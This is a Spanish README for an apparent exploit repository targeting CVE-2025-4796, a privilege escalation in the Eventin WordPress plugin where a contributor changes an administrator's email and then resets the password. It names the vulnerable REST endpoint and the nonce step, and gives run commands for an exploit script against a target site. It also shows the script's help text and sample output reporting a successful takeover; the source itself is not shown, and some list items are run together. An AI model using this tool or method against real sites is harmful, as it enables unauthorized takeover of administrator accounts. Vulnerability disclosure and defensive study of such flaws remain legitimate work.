
Eventin <= 4.0.34 - Autenticado (Colaborador+) Escalada de Privilegios mediante Cambio de Correo Electrónico del Usuario/Toma de Control de Cuenta
Eventin <= 4.0.34 - Escalada de privilegios autenticada (Contributor+) mediante cambio de correo electrónico del usuario / toma de control de la cuenta
Este repositorio documenta una vulnerabilidad de escalada de privilegios en el plugin Eventin de WordPress (<= 4.0.34) que permite a un usuario autenticado con capacidades de Contributor+ cambiar las direcciones de correo electrónico de usuarios arbitrarios a través de la API de actualización de ponentes del plugin. Al cambiar el correo electrónico de un administrador, un atacante puede provocar un restablecimiento de contraseña y tomar control de la cuenta.
Componente vulnerable: plugin Eventin de WordPress (Eventin\Speaker\Api\SpeakerController::update_item)
Versiones afectadas: <= 4.0.34
CVE: CVE-2025-4796
CVSS: 8.8 (Alta)
Instalaciones activas: 10,000+
Eventin no valida correctamente la identidad o los permisos de quien realiza la solicitud antes de actualizar los detalles del ponente/usuario (específicamente el correo electrónico). Un atacante autenticado como colaborador (o superior) puede cambiar la dirección de correo electrónico de otros usuarios, incluidos los administradores, mediante el endpoint REST del plugin:
Una vez que el correo electrónico se cambia a una dirección controlada por el atacante, se puede utilizar el flujo estándar de restablecimiento de contraseña de WordPress para tomar el control de la cuenta.
Archivo: CVE-2025-4796.py
Este script automatiza los siguientes pasos:
X-WP-Nonce requerido/wp-json/eventin/v2/speakers/<speaker_id> para actualizar el correo electrónico del ponente.Requisitos:
Instalación:
pip install requests
Ejecute el script desde la línea de comandos:
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password
Mostrar ayuda del script:
python CVE-2025-4796.py -h
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD
Exploit For: CVE-2025-4796 By: Nxploited
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-id, --speaker_id SPEAKER_ID
Enter the speaker ID for the user
-email, --email EMAIL
Enter a new email address
-user, --username USERNAME
Enter the username for the account to upgrade
-pass, --password PASSWORD
Enter the password for the account to upgrade
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...
[+] Exploitation in progress, please wait ...
[+] Exploitation successful.
[+] The account has been updated to Admin.
Speaker ID : 9
Email : [email protected]
[!] Please reset your password using the email: [email protected]
X-WP-Nonce de la página de administración.Por: Khaled Alenaz (Nxploited)
GitHub: https://github.com/Nxploited/